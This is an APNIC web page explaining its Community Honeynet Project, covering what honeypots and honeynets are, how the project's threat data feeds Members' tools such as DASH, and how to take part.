APNIC Home

Honeynet

What is the APNIC Honeynet Project, and why was it started?

The APNIC Community Honeynet Project was launched in 2019 to improve visibility into malicious activity targeting networks in the Asia Pacific region. By deploying honeypot sensors across diverse locations, the project collects data on suspicious traffic, malware, and attack patterns. This information supports APNIC Members, researchers, and the broader community in understanding threats and strengthening Internet security.

The APNIC Honeynet Project was established to:

  • Enhance the capabilities of network engineers and security analysts by using honeypots to learn about cybersecurity.
  • Share threat-related information with APNIC Members and relevant stakeholders in the security community.
  • Collaborate with relevant partners in areas that can benefit the community.

The project contributes to global threat intelligence platforms and powers APNIC’s own tools, including DASH, helping Members monitor and respond to malicious traffic more effectively.

What are honeypots and honeynets?

A honeypot is a decoy system designed to attract attackers and observe their behaviour. It simulates vulnerable services to detect intrusion attempts and gather intelligence. A honeynet is a distributed network of honeypots that increases the volume and diversity of data collected.

Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack, or attempt to compromise. Once a compromised device or attacker connects to a honeypot, analysts can collect observables such as source IP addresses, hosts serving malicious code, or techniques for gaining a foothold on the honeypot. These insights help analysts understand the broader context of an attack.

Together, honeypots and honeynets help study attacker tools and tactics, and detect both global and localized threats targeting specific IP ranges or Autonomous System Numbers (ASNs).

How can I benefit from the APNIC Honeynet Project?

If you’re an APNIC Member, you can access threat intelligence derived from the Honeynet Project through tools like DASH. This data helps you:

  • Monitor malicious traffic coming from your network.
  • Understand the nature and origin of attacks.
  • Improve your security posture, incident response, and remediation.

DASH also provides insights into threats by origin-AS, and APNIC offers support to help Members interpret and act on this data. Information from the Honeynet Project is also shared with security organizations to the benefit of the wider Internet community.

How can I get involved in the APNIC Honeynet Project?

You can contribute to the Honeynet Project by:

  • Participating in threat sharing sessions and security events.
  • Collaborating on data analysis and infrastructure development

The project also supports hands-on training using real-time data, packet capture files, and logs, and can be especially valuable for small and underserved economies.

If you would like to learn more, contact project@honeynet.asia